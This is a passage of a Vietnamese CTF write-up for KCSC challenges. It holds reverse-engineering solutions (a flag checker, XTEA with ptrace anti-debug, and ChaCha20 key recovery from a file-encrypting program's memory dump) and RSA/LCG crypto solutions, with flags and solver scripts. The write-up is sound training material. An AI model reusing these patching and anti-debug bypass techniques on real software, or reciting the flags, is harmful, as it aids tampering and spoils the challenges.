    v7 = -1i64;
    do
      ++v7;
    while ( byte_1400047A8[v7] );
    if ( v7 == 40 )
    {
      sub_140001000(byte_1400047A8);
      dword_1400047A0 = 1;
      for ( i = 0; i < 40; ++i )
      {
        v4 = dword_140004700;
        v3 = dword_140004700[i];
        if ( dword_140004080[i] != (_DWORD)v3 )
          dword_1400047A0 = 0;
      }
    }
  }
  if ( dword_1400047A0 )
    sub_140001200("Excellent!! Here is your flag: KCSC{%s}", byte_1400047A8);
  else
    sub_140001200("You're chicken!!!", v3, v4);
  return 0;
}

Phân tích sơ qua thì đây có thể là 1 bài flagchecker với một số hàm mã hóa cơ bản
Lần 1:

Chương trình nhận vào input và kiểm tra 1 điều kiện gì đấy

Qua kiểm tra thì đây có thể là một loại hash nào đấy
Vì không thể dịch ngược được và không ảnh hưởng quá nhiều đến chương trình nên mình sẽ patch luôn tại đây để bỏ qua bước kiểm tra điều kiện này

Lần 2:

Đếm số phần tử có trong byte_7FF64BE347A8 (là input ta nhập vào) và kiểm tra xem có đủ 40 ký tự không
gọi hàm sub_7FF64BE31000 để mã hóa

Hàm sub_7FF64BE31000 lấy từng bytes của input rồi xor với các phép toán dịch bit ROR, ROL nhiều lần rồi lưu các giá trị đó vào dword_7FF64BE34700
Cuối cùng là kiểm tra từng phần tử (dword) trong mảng dword_7FF64BE34700 và dword_7FF64BE34080 với nhau:

Tổng kết:
- Kiểm tra hash (bỏ qua)
- Mã hóa qua hàm sub_7FF64BE31000
- Kiểm tra
Do mã hóa từng bytes một nên mình sẽ bruteforce luôn để tiết kiệm thời gian dịch ngược
Script solve:
def _rol(val, bits, bit_size=32):
    return (val << bits % bit_size) & (2 ** bit_size - 1) | ((val & (2 ** bit_size - 1)) >> (bit_size - (bits % bit_size)))
def _ror(val, bits, bit_size=32):
    return ((val & (2 ** bit_size - 1)) >> bits % bit_size) | (val << (bit_size - (bits % bit_size)) & (2 ** bit_size - 1))

def sub_7FF765091000(a1):
    for i in range(len(a1)):
        v2 = a1[i] 
        v5 = 4
        v6 = 6
        for j in range(5):
            v2 ^= _rol(v2, v5) ^ _ror(v2, v6)
            v5 *= 2
            v6 *= 2


    return (v2)
enc=[
    0x0F30C0330, 0x340DDE9D, 0x750D9AC9, 0x391FBC2A, 0x9F16AF5B, 0x0E6180661,
    0x6C1AAC6B, 0x340DDE9D, 0x0B60D5635, 0x9F16AF5B, 0x0A3195364, 0x681BBD3A,
    0x0F30C0330, 0x0A3195364, 0x0AB1B71C6, 0x0F30C0330, 0x0F21D5274, 0x9F16AF5B,
    0x0E6180661, 0x300CCFCC, 0x0F21D5274, 0x9F16AF5B, 0x0AB1B71C6, 0x0A3195364,
    0x750D9AC9, 0x0A3195364, 0x9F16AF5B, 0x0F21D5274, 0x0F30C0330, 0x0A3195364,
    0x0F21D5274, 0x351C8FD9, 0x710C8B98, 0x0F70D1261, 0x2D1AE83F, 0x0F30C0330,
    0x0EE1A24C3, 0x0F70D1261, 0x6108CEDC, 0x6108CEDC
]
flag=''
for e in enc:
    for i in range(33,127):
        a=sub_7FF765091000((flag+chr(i)).encode())
        if a==e:
            flag=flag+chr(i)
            print(flag)
            break

#345y_fl46_ch3ck3r_f0r_kc5c_r3cru17m3n7!!

Mình có tham khảo script chuyển ROR,ROL sang python tại: https://github.com/tandasat/scripts_for_RE/blob/master/rotate.py
Flag: KCSC{345y_fl46_ch3ck3r_f0r_kc5c_r3cru17m3n7!!}
Thông thường mình sẽ không quá để ý việc dịch ngược hay chuyển code sang python cho những bài flagchecker như này mà sẽ hay xài gdb để bruteforce nhanh flag.
Tuy nhiên lần này gdb không decompile được nên mình đã không thể xài lại trick cũ, đây cũng là bài học cho mình để thay đổi tư duy làm bài và nghiên cứu nghiêm túc hơn trong tương lai!
có thể tham khảo 1 số bài mình đã giải bằng gdb tại: https://hackmd.io/@robertowen/rkXtc16N1l
Reverse me

Pseudocode (khá dễ nhìn):
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int i; // [rsp+18h] [rbp-58h]
  int j; // [rsp+1Ch] [rbp-54h]
  char s[56]; // [rsp+30h] [rbp-40h] BYREF
  unsigned __int64 v7; // [rsp+68h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  memset(s, 0, 0x31uLL);
  printf("FLAG: ");
  __isoc99_scanf("%48s", s);
  for ( i = 0; i <= 47; i += 8 )
    sub_12D4(&s[i], &s[i + 4]);
  for ( j = 0; ; ++j )
  {
    if ( j > 47 )
    {
      puts("Correct!");
      return 0LL;
    }
    if ( s[j] != byte_4040[j] )
      break;
  }
  puts("Incorrect!");
  return 0LL;
}

Vì mình không cài IDA lên WSL nên mình sẽ debug remote như này


Do chương trình cũng đơn giản nên ta chỉ phân tích nhanh

- Chương trình nhận vào 48 bytes từ input và mã hóa thông qua hàm sub_5555555552D4, lưu trữ luôn vào s
- Kiểm tra với byte_555555558040, nếu đúng thì trả về Correct, sai thì Incorrect
Hàm mã hóa sub_5555555552D4:

Ta có thể nhận ra đây là mã hóa XTEA khá quen thuộc
Mình có tham khảo chương trình decrypt XTEA bằng python tại: https://github.com/niklasb/ctf-tools/blob/master/crypto/xtea.py
Script:
from Crypto.Util.number import*
dword_5555555580C0=[0x126575B, 0x51903231, 0x8AAB8F5E, 0x0CA51930F]
byte_555555558040=[473413356, 2967692918, 1094173039, 1162692205, 2047540795, 593189689, 3392237974, 2109325366, 3133376540, 144254372, 4264188329, 2498107430]
rounds = 32
mask = 0xffffffff
delta = 0x9E3779B9
def decrypt(v, key):
    v=list(v)
    sum=(delta*rounds)&mask
    for _ in range(rounds):
        v[1] -= (((v[0] << 4) ^ (v[0] >> 5)) + v[0]) ^ (sum + key[(sum>>11) & 3])
        v[1] &= mask
        sum = (sum-delta)&mask
        v[0] -= (((v[1] << 4) ^ (v[1] >> 5)) + v[1]) ^ (sum + key[sum & 3])
        v[0] &= mask
    return v
if __name__ == "__main__":
    n=b''
    for j in range(0,len(byte_555555558040),2):
        a=(decrypt(byte_555555558040[j:j+2], dword_5555555580C0))
        for i in range(2):
            n+=(long_to_bytes(a[i])[::-1])
    print(n)
#b'\xec\xb0LNQ\xa7r\xdd}\x1d\x0c\x9c\x0f\x9e\x93\x8ez\xb6\x1d\xedC\xea{H\xa93\x9f\x1a\rj\xa9\xc9m\xb5\xbc\xf1%\xc6\xb6.\x80,II\x1e\xb3\x103'

Đến đây mình mới phát hiện ra điều gì đấy không đúng, ngồi fix lại chương trình decrypt khá lâu vì nghĩ chắc là sai ở đâu đấy, cuối cùng mình đã phải xem xét lại kỹ file binary

Trong functions mình thấy chương trình có gọi ptrace - là syscall chống debug trong Linux
Do đây không phải là file Windows excutable nên sẽ không có các WinAPI như IsDebuggerPresent() hay NtQueryInformationProcess() nên ta cần lưu ý khi làm bài
Ta trỏ đến địa chỉ gọi ptrace:

Nếu ta debug thì chương trình sẽ chuyển sang luồng fake, dẫn đến key decrypt XTEA bị sai
Xem pseudo code để có cái nhìn trực quan hơn:

Ta có thể nhận thấy khác nhau ở off_555555558080 và off_555555558090 giữa luồng fake và luồng real dẫn đến chương trình trả về 2 key khác nhau
Cần sửa ZF hoặc patch để chương trình đưa vào luồng đúng
Lúc này ta có thể lấy dword_5555555580C0 chuẩn ra và bỏ vào script solve:
from Crypto.Util.number import*
#dword_5555555580C0=[0x126575B, 0x51903231, 0x8AAB8F5E, 0x0CA51930F]
dword_5555555580C0=[
    0x3AB27278,
    0x0A840805B,
    0x0E864925B,
    0x0B7B1EEDE]
byte_555555558040=[473413356, 2967692918, 1094173039, 1162692205, 2047540795, 593189689, 3392237974, 2109325366, 3133376540, 144254372, 4264188329, 2498107430] #dword
rounds = 32
mask = 0xffffffff
delta = 0x9E3779B9
def decrypt(v, key):
    v=list(v)
    sum=(delta*rounds)&mask
    for _ in range(rounds):
        v[1] -= (((v[0] << 4) ^ (v[0] >> 5)) + v[0]) ^ (sum + key[(sum>>11) & 3])
        v[1] &= mask
        sum = (sum-delta)&mask
        v[0] -= (((v[1] << 4) ^ (v[1] >> 5)) + v[1]) ^ (sum + key[sum & 3])
        v[0] &= mask
    return v
if __name__ == "__main__":
    n=b''
    for j in range(0,len(byte_555555558040),2):
        a=(decrypt(byte_555555558040[j:j+2], dword_5555555580C0))
        for i in range(2):
            n+=(long_to_bytes(a[i])[::-1])
    print(n)
#b'KCSC{XTEA_encryption_and_debugger_detection_:>>}'

Flag: KCSC{XTEA_encryption_and_debugger_detection_:>>}
ChaChaCha

Bài này mình tốn cả chiều để viết script decrypt tuy nhiên cuối cùng mình lại giải được mà không cần decrypt :(( làm mình khá đuối sức và buồn ngủ

Để cho ta 3 file, 1 file dump, 1 file txt và 1 file exe
Mở important_note.txt bằng hex editor và nhìn kích thước file thì ta có thể đoán rằng đây là 1 file đã bị mã hóa:

Mở file ChaChaCha.exe bằng IDA ta có pseudo code như sau:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  HMODULE LibraryA; // eax
  BOOLEAN (__stdcall *SystemFunction036)(PVOID, ULONG); // eax
  HMODULE v5; // eax
  BOOLEAN (__stdcall *ProcAddress)(PVOID, ULONG); // eax
  HANDLE FileW; // eax
  void *v8; // ebx
  signed int FileSize; // edi
  _BYTE *v11; // ebx
  int v12; // ecx
  _BYTE *v13; // ecx
  signed int v14; // esi
  signed int v15; // ebx
  _BYTE *v16; // eax
  char v17; // al
  char v18; // [esp+0h] [ebp-D8h]
  HANDLE hFile; // [esp+Ch] [ebp-CCh]
  signed int v20; // [esp+10h] [ebp-C8h]
  char *v21; // [esp+14h] [ebp-C4h]
  _BYTE *v22; // [esp+18h] [ebp-C0h]
  char *v23; // [esp+1Ch] [ebp-BCh]
  DWORD NumberOfBytesWritten; // [esp+20h] [ebp-B8h] BYREF
  DWORD NumberOfBytesRead; // [esp+24h] [ebp-B4h] BYREF
  char v26[48]; // [esp+28h] [ebp-B0h] BYREF
  int v27; // [esp+58h] [ebp-80h]
  char v28[64]; // [esp+68h] [ebp-70h] BYREF
  char v29[32]; // [esp+A8h] [ebp-30h] BYREF
  char v30[12]; // [esp+C8h] [ebp-10h] BYREF

  LibraryA = LoadLibraryA("advapi32.dll");
  SystemFunction036 = (BOOLEAN (__stdcall *)(PVOID, ULONG))GetProcAddress(LibraryA, "SystemFunction036");
  SystemFunction036(v29, 32);
  v5 = LoadLibraryA("advapi32.dll");
  ProcAddress = (BOOLEAN (__stdcall *)(PVOID, ULONG))GetProcAddress(v5, "SystemFunction036");
  ProcAddress(v30, 12);
  FileW = CreateFileW(FileName, 0xC0000000, 0, 0, 3u, 0x80u, 0);
  v8 = FileW;
  hFile = FileW;
  if ( FileW == (HANDLE)-1 )
  {
    sub_401590("Cannot Open File", v18);
    CloseHandle((HANDLE)0xFFFFFFFF);
    return 1;
  }
  else
  {
    FileSize = GetFileSize(FileW, 0);
    v20 = FileSize;
    v21 = (char *)malloc(FileSize);
    if ( ReadFile(v8, v21, FileSize, &NumberOfBytesRead, 0) )
    {
      v11 = malloc(FileSize);
      v22 = v11;
      sub_4013D0(v12, v30);
      v14 = 0;
      if ( FileSize > 0 )
      {
        v23 = v28;
        do
        {
          sub_401000(v26, v28, v13);
          ++v27;
          v15 = v14 + 64;
          if ( !__OFSUB__(v14, v14 + 64) )
          {
            v16 = v22;
            do
            {
              if ( v14 >= FileSize )
                break;
              v13 = &v16[v14];
              v17 = v23[v14] ^ v16[v14 + v21 - v22];
              ++v14;
              FileSize = v20;
              *v13 = v17;
              v16 = v22;
            }
            while ( v14 < v15 );
          }
          v23 -= 64;
          v14 = v15;
        }
        while ( v15 < FileSize );
        v11 = v22;
      }
      SetFilePointer(hFile, 0, 0, 0);
      if ( WriteFile(hFile, v11, FileSize, &NumberOfBytesWritten, 0) )
      {
        CloseHandle(hFile);
        sub_401590("Some important file has been encrypted!!!\n", (char)FileName);
        return 0;
      }
      else
      {
        sub_401590("Cannot Write File", v18);
        CloseHandle(hFile);
        return 1;
      }
    }
    else
    {
      sub_401590("Cannot Read File", v18);
      CloseHandle(v8);
      return 1;
    }
  }
}

Phân tích:
Đầu tiên chương trình tạo 1 Buffer ngẫu nhiên 32 bytes và 1 Buffer 12 bytes:

Tiếp đến là các bước mở file, đọc file gì đấy tuy nhiên mình sẽ không đi phân tích phần này:

Tiếp đến gọi hàm sub_8913D0:

Bên trong có khá nhiều phép toán bitwise, có thể là thuật toán tạo khóa nào đấy:

Ta để ý:
qmemcpy(a2, "expand 32-byte k", 16);

Đây có thể là gọi sig của mã hóa salsa20 hoặc chacha20, tuy nhiên đề bài là ChaChaCha nên khả năng cao là chacha20
Ta có thể hiểu là tạo ma trận 4x4, hàng 1 là chuỗi “expand 32-byte k”, 2 hàng tiếp theo là 32 bytes key, 4 bytes đầu tiên của hàng cuối là counter = 1129530187 = 'KCSC' và 12 bytes cuối là nonce

Tìm hiểu thêm tại https://xilinx.github.io/Vitis_Libraries/security/2019.2/guide_L1/internals/chacha20.html
đặt breakpoint như sau và mở hexview, ta có thể thấy key và nonce đã được lưu trữ:

Tiếp theo:

Gọi hàm sub_891000 là mã hóa file bằng thuật toán chacha20
Sau đó là xor gì đấy mình không hiểu lắm, có lẽ đây là nguyên nhân khiến mình viết chương trình decrypt cả chiều không được (sau khi tham khảo các WU khác thì thấy mọi người sử dụng CyberChef để decrypt)
Tạm dừng ở đây, ta sẽ phân tích file dump:
Search strings "expand 32-byte k" trong IDA:

Click vào để tìm địa chỉ lưu nó:

Do file dump này trích được memory lúc file bị mã hóa thành important_note.txt nên đây sẽ là key và nonce để decrypt file
dump lấy bytes:
[0x65, 0x78, 0x70, 0x61, 0x6E, 0x64, 0x20, 0x33, 0x32, 0x2D, 0x62, 0x79, 0x74, 0x65, 0x20, 0x6B, 0xD9, 0xFA, 0xBB, 0x42, 0x0C, 0x2D, 0xB8, 0x08, 0xD1, 0xF8, 0xBF, 0xA5, 0x89, 0x0A, 0xC3, 0xB3, 0x84, 0x9F, 0x69, 0xE2, 0xF3, 0x30, 0xD4, 0xA9, 0x0D, 0xB1, 0x19, 0xBD, 0x4E, 0xA0, 0xB8, 0x30, 0x4B, 0x43, 0x53, 0x43, 0xDB, 0x7B, 0xE6, 0x93, 0xEE, 0x9B, 0xC1, 0xA4, 0x70, 0x73, 0xCA, 0x4B]

Do chacha20 có thể dùng chương trình mã hóa để giải mã(mã dòng), nên mình sẽ patch luôn bộ nhớ tại key hiện tại thành key lấy từ file dump để giải mã file important_note.txt
đặt breakpoint tại:

Ta chạy script sau để thay đổi thay đổi bộ nhớ (không thấy ai xài cách này nên tâm đắc vl 😈)
import idaapi
import idc
start_addr = 0x00AFFAA0#địa chỉ sẽ khác nhau mỗi lần debug, cần thay đổi khi thử chạy
end_addr = start_addr+63
new_data = [
    0x65, 0x78, 0x70, 0x61, 0x6E, 0x64, 0x20, 0x33, 0x32, 0x2D, 0x62, 0x79,
    0x74, 0x65, 0x20, 0x6B, 0xD9, 0xFA, 0xBB, 0x42, 0x0C, 0x2D, 0xB8, 0x08,
    0xD1, 0xF8, 0xBF, 0xA5, 0x89, 0x0A, 0xC3, 0xB3, 0x84, 0x9F, 0x69, 0xE2,
    0xF3, 0x30, 0xD4, 0xA9, 0x0D, 0xB1, 0x19, 0xBD, 0x4E, 0xA0, 0xB8, 0x30,
    0x4B, 0x43, 0x53, 0x43, 0xDB, 0x7B, 0xE6, 0x93, 0xEE, 0x9B, 0xC1, 0xA4,
    0x70, 0x73, 0xCA, 0x4B
]

for i in range(len(new_data)):
    addr = start_addr + i
    idc.patch_byte(addr, new_data[i])
print(f"Thay đổi bộ nhớ thành công từ {hex(start_addr)} đến {hex(end_addr)}")

Sau khi thay đổi bộ nhớ, tiếp tục chạy hết chương trình để mã hóa lại file
Mở lại file important_note.txt lúc nãy ra, ta thấy file đã được decrypt thành công

Nhìn header ta có thể thấy đây là một file Windows excutable
Chạy file exe, ta được:


WaiterFall

Mở IDA:

Nhìn có vẻ rất khủng bố :O
Tuy nhiên đây chỉ là 1 dạng bài sử dụng Z3 rất kinh điển
Solve Script: (byClaude)
from z3 import *

def solve_challenge():
    s = Solver()
    chars = [BitVec(f'char_{i}', 8) for i in range(62)]
    v3 = 0

    v5 = 0x1000008020020
    v7 = 0x60010020000100
    v8 = 0x100020080408000
    v9 = 0x844000044000
    for i, char in enumerate(chars):
        s.add(char >= 32)  # Space
        s.add(char <= 126)  # ~        
        conditions = []
        conditions.append(If(char == ord('C'), If((i - 1) & 0xFFFFFFFD == 0, 1, 0), 0))
        conditions.append(If(char == ord('K'), If(i == 0, 1, 0), 0))
        conditions.append(If(char == ord('S'), If(i == 2, 1, 0), 0))
        conditions.append(If(char == ord('c'), If(i == 37, 1, 0), 0))
        conditions.append(If(char == ord('d'), If(i == 20, 1, 0), 0))
        conditions.append(If(char == ord('g'), If(Or(i == 11, i == 60), 1, 0), 0))
        conditions.append(If(char == ord('u'), If(i == 24, 1, 0), 0))
        conditions.append(If(char == ord('{'), If(i == 4, 1, 0), 0))
        conditions.append(If(char == ord('}'), If(i == 61, 1, 0), 0))

        if i <= 0x31:  # For '_'
            if (0x2101004011000 >> i) & 1:
                conditions.append(If(char == ord('_'), 1, 0))

        if i <= 0x34:  # For 'a'
            if (0x10000210000040 >> i) & 1:
                conditions.append(If(char == ord('a'), 1, 0))

        if i <= 0x37:  # For 'e'
            if (0x80000040200000 >> i) & 1:
                conditions.append(If(char == ord('e'), 1, 0))

        if i <= 0x32:  # For 'f'
            if (0x4200100802000 >> i) & 1:
                conditions.append(If(char == ord('f'), 1, 0))

        if i <= 0x3A:  # For 'i'
            if (0x400000000000280 >> i) & 1:
                conditions.append(If(char == ord('i'), 1, 0))

        if i <= 0x33:  # For 'l'
            if (0x8480C02000000 >> i) & 1:
                conditions.append(If(char == ord('l'), 1, 0))

        if i <= 0x3B:  # For 'n'
            if (0xA00008000080400 >> i) & 1:
                conditions.append(If(char == ord('n'), 1, 0))

        if i <= 0x2F:  # For 'o'
            if (v9 >> i) & 1:
                conditions.append(If(char == ord('o'), 1, 0))

        if i <= 0x38:  # For 'r'
            if (v8 >> i) & 1:
                conditions.append(If(char == ord('r'), 1, 0))

        if i <= 0x36:  # For 't'
            if (v7 >> i) & 1:
                conditions.append(If(char == ord('t'), 1, 0))

        if i <= 0x30:  # For 'w'
            if (v5 >> i) & 1:
                conditions.append(If(char == ord('w'), 1, 0))        
        v3 = v3 + Sum(conditions)
    s.add(v3 == 62)

    if s.check() == sat:
        m = s.model()
        result = ''
        for i in range(62):
            c = m[chars[i]].as_long()
            result += chr(c)
        return result
    return None

result = solve_challenge()
if result:
    print("Flag:", result)
else:
    print("No solution found")
#Flag: KCSC{waiting_for_wonderful_waterfall_control_flow_flatterning}

Flag: KCSC{waiting_for_wonderful_waterfall_control_flow_flatterning}
V. Crypto
Crypto 1 (easy)


Source:
  from Crypto.Util.number import *
  from math import gcd

  flag = b"KCSC{fake_flag}"

  p = getPrime(512)
  q = getPrime(512)
  n = p*q
  e = 0x10001
  c = pow(bytes_to_long(flag), e, n)

  print(f"n = {n}")
  print(f"c = {c}")
  print(13 * q ** 2 + 5*p * q + 2 * p ** 5)
  print(7 * q ** 3 + p ** 3)

  """
  n = 68288521803749096598885637638053621717196600162883393314204537792265324550130476000830582459892601191221713398147068471895218340440441520348186049243098557276069294337290348570168822004443403024217772173472817801983123070596861372926544266786307347422625999741472764054251261966242723803223755250857431959613
  c = 51484360656675894405169578577777421818221080188874188339332704212766014455602299232733441854614491353614936672698767100621643701474052897096397257567627546370308824123953740553988694850896612092526733722171750215446879926157508653359056454370778767748861899945472045315573513667461778478951641271690253340703
  99070322718633589075437462797565157261778565342202176866775343970398558639214129862647491552411934954337080928975984888590350647667063750589996693551004764949048370796506334502440334616612079528441181921243264137829513725003752633040825654275249100544290948338516838946174770287568358642193272862193796894044937197882972942736350187023160283258646203934697126833099845086570117310993425665455046278368788256843647321433937611726466080931200057154600456738627871172358125025243308598393199170155505096434440339433895197600955266878886512068835988415711337072167542113641557473147599428014808952558696371214362762804029219711275834667722478355607836912560341298862576500518929722837267759516608623300378294362866958920710706131156072317563285732965572961520111862487408104
  4053829493753080394597319030520465552249075460276768487813206903952134102796024072650537404512981555893331018255239607908419904554570951529767887735220350920134963507895001907309725345634404748146887358629605419756823088475689769294303699918630919892363333011358649952996211367887394670736389996674537151867058156643368735877078538193576703224594833465330136899282032495128158051461158831558808541670885217172490157676355847572589184884710346372276161554121356404
   """


Flag của ta được mã hóa RSA nên nếu ta tìm được giá trị p và q của modulus n thì ta sẽ giải mã được Ciphertext rất dễ dàng.

Nhận thấy rằng giá trị của p và q được biểu diễn qua một hệ phương trình như sau:


$$\left\{\begin{matrix} 13 \times q ^ 2 + 5\times p \times q + 2 \times p ^ 5 = k_1\\ 7 \times q ^ 3 + p ^ 3 = k_2 \end{matrix}\right.$$

Mình thấy hệ phương trình này giải tay khá là cực nhưng nếu dùng các thư viện toán học thì sẽ rất nhanh nên để tiết kiệm thời gian, mình sẽ dùng thư viện Sympy để giải. Có được p,q thì bài toán kết thúc.

Script:
  from sympy import var, Eq, solve
  e = 0x10001
  n = 68288521803749096598885637638053621717196600162883393314204537792265324550130476000830582459892601191221713398147068471895218340440441520348186049243098557276069294337290348570168822004443403024217772173472817801983123070596861372926544266786307347422625999741472764054251261966242723803223755250857431959613
  c = 51484360656675894405169578577777421818221080188874188339332704212766014455602299232733441854614491353614936672698767100621643701474052897096397257567627546370308824123953740553988694850896612092526733722171750215446879926157508653359056454370778767748861899945472045315573513667461778478951641271690253340703
  k1 = 99070322718633589075437462797565157261778565342202176866775343970398558639214129862647491552411934954337080928975984888590350647667063750589996693551004764949048370796506334502440334616612079528441181921243264137829513725003752633040825654275249100544290948338516838946174770287568358642193272862193796894044937197882972942736350187023160283258646203934697126833099845086570117310993425665455046278368788256843647321433937611726466080931200057154600456738627871172358125025243308598393199170155505096434440339433895197600955266878886512068835988415711337072167542113641557473147599428014808952558696371214362762804029219711275834667722478355607836912560341298862576500518929722837267759516608623300378294362866958920710706131156072317563285732965572961520111862487408104
  k2 = 4053829493753080394597319030520465552249075460276768487813206903952134102796024072650537404512981555893331018255239607908419904554570951529767887735220350920134963507895001907309725345634404748146887358629605419756823088475689769294303699918630919892363333011358649952996211367887394670736389996674537151867058156643368735877078538193576703224594833465330136899282032495128158051461158831558808541670885217172490157676355847572589184884710346372276161554121356404

  p, q = var("p, q")
  eq1 = Eq(13 * q ** 2 + 5*p * q + 2 * p ** 5, k1)
  eq2 = Eq(7 * q ** 3 + p ** 3, k2)

  solutions = solve([eq1, eq2])[0]

  p = int(solutions[p])
  q = int(solutions[q])
  d = pow(e, -1, n-p-q+1)

  print(pow(c, d, n).to_bytes(50))



Flag: KCSC{solv1ng_equ4ti0ns_with_r3sult4nts_is_f4n}
VlCG (easy)


Source:
  from Crypto.Util.number import *
  from hashlib import *
  from Crypto.Cipher import AES
  from Crypto.Util.Padding import *
  from secret import flag

  class LCG():

      def __init__(self, seed, a, c, m):
          self.seed = seed
          self.a = a
          self.c = c
          self.m = m
          self.state = seed

      def next(self):

          self.seed = (self.a * self.seed ** 65537 + self.c) % m
          return self.seed >> 20

  a = getPrime(50)
  c = getPrime(50)
  m = getPrime(100)
  seed = getRandomInteger(50)

  lcg = LCG(seed, a, c, m)

  key = sha256(long_to_bytes(seed)).digest()
  enc = AES.new(key, AES.MODE_ECB).encrypt(pad(flag, 16))

  hint = []

  print(f"{enc = }")
  print(f"{a = }")
  print(f"{c = }")
  print(f"{m = }")
  print(f"{lcg.next() = }")

  """
  enc = b'\x17j\x1b\xb1(eWHD\x98\t\xfc\x04\x94(\x18\xeaxT\xa6B*\xa0E\xe92\xe36!3\xbc\x96[\xa5\x82eG\xc2\x00\x7fM\xf0\xcb@tN\xf8\x01'      
  a = 758872855643059
  c = 814446603569537
  m = 984792769709730047935594905989
  lcg.next() = 241670272469283782290680
  """


Phân tích source, ta thấy rằng key của AES được tính thông qua key = sha256(long_to_bytes(seed)).digest(), tức nhiệm vụ của ta là phải tìm được seed.


Công thức của seed như sau:
$$\text{S} \equiv \text{a} \times \text{seed}^{65537} + \text{c} \pmod {\text{m}}$$
$$\Leftrightarrow \text{seed}^{65537} \equiv (\text{S} - \text{c}) \times \text{a}^{-1} \pmod {\text{m}}$$

Giờ ta phải triệt tiêu đi số mũ 65537 của seed thì sẽ có được seed. Tương tự như RSA, ta sẽ đi tính
  \(\text{d} = 65537^{-1} \pmod{\phi(m)}\) với \(\phi(m) = m-1\) vì m là số nguyên tố.

Sau đó lấy \(((\text{S} - \text{c}) \times \text{a}^{-1})^{d} \mod m\) là có được seed.


Tuy nhiên để tăng độ khó thì Challenge tiếp tục bỏ đi 20 bit cuối (khoảng 1 triệu) của S. Vì vậy ta cần thêm một bước là brute force 20 bit cuối của S.
$$\text{S} = (\text{lcg.next()} << 20) + i \hspace{3mm} \{1 < i < 2^{20}\}$$

Script:
  from Crypto.Util.number import *
  from hashlib import *
  from Crypto.Cipher import AES
  from Crypto.Util.Padding import *
  from tqdm import trange

  enc = b'\x17j\x1b\xb1(eWHD\x98\t\xfc\x04\x94(\x18\xeaxT\xa6B*\xa0E\xe92\xe36!3\xbc\x96[\xa5\x82eG\xc2\x00\x7fM\xf0\xcb@tN\xf8\x01'      
  a = 758872855643059
  c = 814446603569537
  m = 984792769709730047935594905989
  next_seed = 241670272469283782290680

  e = pow(65537, -1, m-1)
  for i in trange(1, 2**20):

      S = (next_seed << 20) + i # nhớ thêm dấu ngoặc, thiếu là ăn đủ
      seed = (pow((S - c) * pow(a, -1, m), e, m)) % m
      key = sha256(long_to_bytes(seed)).digest()

      flag = AES.new(key, AES.MODE_ECB).decrypt(enc)
      if b"KCSC{" in flag:
          print(flag)
          break



Seed = 504545958124800
Flag: KCSC{linear_congruential_generator(LCG)}
Zoltraak (easy)


Source:
  from Crypto.Util.number import *

  FLAG = b'KCSC{???????????????????????????????????????}'
  m = bytes_to_long(FLAG)
  p = getPrime(512)
  q = getPrime(512)
  n = p * p * q
  e = 0x10001
  d = inverse(e, p * (p-1) * (q-1))
  assert m < n
  c = pow(m, e, n)
  hint = pow(d, e, n)
  print(f'c = {c}')
  print(f'hint = {hint}')
  print(f'n = {n}')

  """
  c = 216895836421936226664808806038131495725544658675106485670550453429609078893908601117272164909327632048129546753076380379045793859323244310633521321055388974634549104918284811813205866773238823220320222756056839297144222443834324484452750837978501262424186119512949111339142374067658940576220209924539508684423305539352188419127746551691195133913843198343764965016833190033138825402951884225991852311634388045499747652928427089105006744062452013466170009819761589
  hint = 119347490709709918515362500613767389632792382149593771026067086829182731765211255478693659388705133600879844115195595226603111752985962235917359759090718061734175658693105117154525703606445141788266279862259884063386378441258483507592794727728695131221071650602175884547070684687593047276747070248401583807925835550653444240529379502255688396376354105756898403267623695663194584556369065618489842778593026855625193720218739585629291162493093893452796713107895772
  n = 947166029378215681573685007119017666168984033297752775080286377779867377305545634376587741948207865073328277940177160532951778642727687102119230712410226086882346969888194915073996590482747649286982920772432363906920327921033567974712097884396540431297147440251083706325071265030933645087536778803607268099965990824052754448809778996696907531977479093847266964842017321766588821529580218132015882438704409614373340861025360688571007185362228026637160817305181421
  """


Challenge cho ta các công thức sau:


$$\begin{gather} \text{d} \equiv e^{-1} \pmod {\phi(n)} \hspace{5mm} (1) \newline \text{hint} \equiv \text{d}^e \pmod n \hspace{5mm} (2) \newline \phi(n) = p \times (p-1) \times (q-1) \newline n = p^2 \times q \newline \end{gather}$$

Từ (1) ta mũ hai vế cho e được:

$$\text{d}^e \equiv e^{-e} \pmod {\phi(n)}$$

Vì p|ϕ(n) nên ta có thể viết phương trình trên thành:

$$\text{d}^e \equiv e^{-e} \pmod {p} \hspace{5mm} (*)$$

Với phương trình (2), ta nhân hai vế cho eemodn được:

$$\text{hint} \times (e^e \mod n) \equiv \text{d}^e \times (e^e \mod n) \pmod n$$

Vì p|n nên ta có thể viết lại phương trình trên như sau:

$$\text{hint} \times (e^e \mod n) \equiv \text{d}^e \times (e^e \mod p) \pmod p \hspace{5mm} (**)$$

Thay (*) vào (**) được:

$$\begin{gather} \text{hint} \times (e^e \mod n) \equiv (e^{-e} \mod p) \times (e^e \mod p) \pmod p \newline \Leftrightarrow \text{hint} \times (e^e \mod n) \equiv (e^{-e} \times e^e \mod p) \pmod p \newline \Leftrightarrow \text{hint} \times (e^e \mod n) \equiv 1 \pmod p \end{gather}$$

\(\Rightarrow \text{hint} \times (e^e \mod n) - 1 = k \times p\)


Giờ ta chỉ cần tính GCD của \(\text{hint} \times (e^e \mod n) - 1\) và n là có p, bài toán kết thúc.

Script:
  from Crypto.Util.number import *
  e = 0x10001
  c = 216895836421936226664808806038131495725544658675106485670550453429609078893908601117272164909327632048129546753076380379045793859323244310633521321055388974634549104918284811813205866773238823220320222756056839297144222443834324484452750837978501262424186119512949111339142374067658940576220209924539508684423305539352188419127746551691195133913843198343764965016833190033138825402951884225991852311634388045499747652928427089105006744062452013466170009819761589
  hint = 119347490709709918515362500613767389632792382149593771026067086829182731765211255478693659388705133600879844115195595226603111752985962235917359759090718061734175658693105117154525703606445141788266279862259884063386378441258483507592794727728695131221071650602175884547070684687593047276747070248401583807925835550653444240529379502255688396376354105756898403267623695663194584556369065618489842778593026855625193720218739585629291162493093893452796713107895772
  n = 947166029378215681573685007119017666168984033297752775080286377779867377305545634376587741948207865073328277940177160532951778642727687102119230712410226086882346969888194915073996590482747649286982920772432363906920327921033567974712097884396540431297147440251083706325071265030933645087536778803607268099965990824052754448809778996696907531977479093847266964842017321766588821529580218132015882438704409614373340861025360688571007185362228026637160817305181421

  p = GCD(hint * pow(e, e, n) - 1, n)
  q = n // (p**2)

  phi = p * (p-1) * (q-1)
  d = pow(e, -1, phi)

